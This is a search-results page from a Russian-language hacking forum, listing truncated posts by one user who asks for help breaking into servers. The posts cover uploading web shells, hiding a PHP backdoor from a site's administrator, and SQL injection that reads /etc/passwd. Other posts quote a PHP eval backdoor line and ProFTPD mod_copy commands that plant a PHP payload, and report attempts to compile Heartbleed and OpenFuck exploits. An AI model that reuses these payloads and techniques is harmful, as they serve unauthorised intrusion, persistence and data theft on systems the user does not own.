Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 68.
На поиск затрачено 0.01 сек.
Поиск: Сообщения от: z0mbie
Раздел: Web-среда/Web-applications 15.04.2016, 09:45
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Имеются ли какие-нибудь способы заливки шелла в...

Имеются ли какие-нибудь способы заливки шелла в Atlassian Confluence и Jira?
Раздел: Web-среда/Web-applications 17.02.2016, 12:15
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Заметил что при пост запросе оптравляется sql...

Заметил что при пост запросе оптравляется sql запрос в формате JSON.Помогите составить правильно.
Storage.execute([!{"select":[{"a":"id"},"id",{"a":"code"},"code"],"from":[{"a":"spr.human.sex"}]}!])
Раздел: Web-среда/Web-applications 15.02.2016, 14:57
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Господа, кто может подсказать в какую сторону...

Господа, кто может подсказать в какую сторону рыть чтобы получить доступ к серверу на OC Windows.
Имеется апач на том же сервере и уязвимый скрипт(или настройки? CWE-22) через которые я могу читать...
Раздел: Целевые системы/Target systems 11.05.2015, 16:34
Ответов: 13
Просмотров: 20,889
Автор z0mbie
из /proc/self/cmdline

из /proc/self/cmdline
Раздел: Целевые системы/Target systems 11.05.2015, 16:32
Ответов: 13
Просмотров: 20,889
Автор z0mbie
https://github.com/rapid7/metasploit-framework/pul...

https://github.com/rapid7/metasploit-framework/pull/5224/files
Как пример pikabu
Раздел: Целевые системы/Target systems 11.05.2015, 13:54
Ответов: 13
Просмотров: 20,889
Автор z0mbie
Проверки на ответ от сервера небыло В питоне...

Проверки на ответ от сервера небыло
В питоне плохо шарю. Но полностью переделал скрипт:

ips=0
l=[]
f1 = open("c:/ip/good.txt", 'w')
with open('c:/ip/ip.txt') as f :
l = f.read().splitlines()...
Раздел: Целевые системы/Target systems 09.05.2015, 20:54
Ответов: 13
Просмотров: 20,889
Автор z0mbie
Бывали случаи когда не удавалось скопировать...

Бывали случаи когда не удавалось скопировать ошибку с мини шеллом с помощью site cpfr /proc/self/fd/3
Помог этот способ
SITE CPTO /tmp/...<?php phpinfo();?>
SITE CPFR /tmp/...<?php...
Раздел: Целевые системы/Target systems 12.04.2015, 01:18
Ответов: 13
Просмотров: 20,889
Автор z0mbie
ProFTPD mod_copy

В ftp-сервере ProFTPD обнаружена опасная уязвимость, которая позволяет копировать файлы в пределах сервера без проведения аутентификации с помощью команд "site cpfr" и "site cpto". Проблема...
Раздел: Повышение привилегий/Privilege escalation 06.10.2014, 19:17
Ответов: 1,219
Просмотров: 578,741
Автор z0mbie
Требуется помощь. glibc не выходит, не нашел...

Требуется помощь.
glibc не выходит, не нашел папку, жесткая ссылка не создается
[code]
\n================================================\n[b]uname...
Раздел: Сценарии/CMF/СMS 06.10.2014, 16:22
Ответов: 65
Просмотров: 110,545
Автор z0mbie
Есть у кого нибудь полный скрипт брута? ...

Есть у кого нибудь полный скрипт брута?
http://blog.spiderlabs.com/2014/09/leveraging-lfi-to-get-full-compromise-on-wordpress-sites.html
Раздел: Целевые системы/Target systems 02.10.2014, 10:37
Ответов: 26
Просмотров: 28,114
Автор z0mbie
как эксплуатировать на OpenSSH ? Странно что...

как эксплуатировать на OpenSSH ?

Странно что шелшок считают хуже чем heartbleed. Не думаю что оно имеет такое распространение как hb
Раздел: Web-среда/Web-applications 18.09.2014, 21:37
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Подскажите как в linux узнать к какому сервису...

Подскажите как в linux узнать к какому сервису привязана корпоративная почта, или вообще как найти вход в почту. И где хранятся письма?
Раздел: Web-среда/Web-applications 16.09.2014, 18:28
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Подскажите простенький asp бэкдор, необходимо...

Подскажите простенький asp бэкдор, необходимо залить через sql.

при заливке шелла в начале и в конце добавляется:
\N \N text \N \N
Раздел: Повышение привилегий/Privilege escalation 15.09.2014, 02:49
Ответов: 1,219
Просмотров: 578,741
Автор z0mbie
Прошу гуру ответить, такая вот шняга выходит, не...

Прошу гуру ответить, такая вот шняга выходит, не хочет коннектится:
./exploit 0x6b ip 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by...
Раздел: Web-среда/Web-applications 27.06.2014, 12:51
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Как скрыть код php внутри другого кода? К примеру...

Как скрыть код php внутри другого кода? К примеру имеем Index.php и мне нужно вставить туда свой код, админ всегда замечает мой код и удаляет.
Раздел: Web-среда/Web-applications 14.06.2014, 22:08
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Благодарю, помогло.

Благодарю, помогло.
Раздел: Web-среда/Web-applications 14.06.2014, 00:20
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
PHP Version 5.3.3 System Linux site.com...

PHP Version 5.3.3

System Linux site.com 2.6.32-042stab072.10 #1 SMP Wed Jan 16 18:54:05 MSK 2013 x86_64
Build Date Dec 11 2013 03:27:35
Configure Command './configure'...
Раздел: Web-среда/Web-applications 13.06.2014, 23:30
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
при system('ls -la'); ничего не происходит вывода...

при system('ls -la'); ничего не происходит вывода нет. (Смотрел даже в исходном коде страницы)
Инклуд также не получился. Хотя может даже и не сработала команда инклуд.
Раздел: Web-среда/Web-applications 13.06.2014, 22:40
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Есть бэкдор php eval($_POST['sys_call']); ...

Есть бэкдор php
eval($_POST['sys_call']);
Отправляю пост phpinfo(); все удачно, php 5 версии.
allow_url_fopen On
allow_url_include Off
Раньше шелл заливал так:...
Раздел: Web-среда/Web-applications 03.06.2014, 12:30
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Выдало 1, прочитать нельзя, база подключена к...

Выдало 1, прочитать нельзя, база подключена к localhost, возможно ли залить шелл если найти папку с правами на запись? И если да, как будет выглядеть запрос при фильтрации кавычек? бэкдор и путь...
Раздел: Web-среда/Web-applications 03.06.2014, 03:51
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Подскажите по поводу чтения. File_Priv = Y ...

Подскажите по поводу чтения. File_Priv = Y
Читаю файл /etc/passwd через пост
(1)OR(SELECT(1)FROM(SELECT...
Раздел: Web-среда/Web-applications 29.04.2014, 20:03
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Есть иньекция, как я понял в order by ...

Есть иньекция, как я понял в order by
site.com/index.php?p=news&page=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to...
Раздел: Web-среда/Web-applications 16.04.2014, 12:24
Ответов: 3,616
Просмотров: 1,974,208
Автор z0mbie
Отправляю пост ...

Отправляю пост
mail=Remind%20password&Email=test@test.com
ничего
при
mail=Remind%20password&Email[]=test@test.com
You have an error in your SQL syntax; check the manual that corresponds to...
Раздел: Повышение привилегий/Privilege escalation 14.04.2014, 22:46
Ответов: 28
Просмотров: 24,048
Автор z0mbie
Выполняю команду gcc -lssl -lcrypto...

Выполняю команду
gcc -lssl -lcrypto heartbleed.c -o heartbleed

получаю


/tmp/ccZqYMFA.o: In function `ssl_init':
heartbleed.c:(.text+0x24e): undefined reference to `SSL_load_error_strings'...
Раздел: Повышение привилегий/Privilege escalation 13.04.2014, 16:32
Ответов: 28
Просмотров: 24,048
Автор z0mbie
run.sh #!/bin/bash while true; do ...

run.sh
#!/bin/bash

while true; do
shost=$1
sgrep=$2
./check.py $shost | sed -e 's/....: .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. //g' | sed -e 's/\.//g' | sed -e 's/ //g' | tr -d '\r\n'...
Показано с 1 по 25 из 68.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot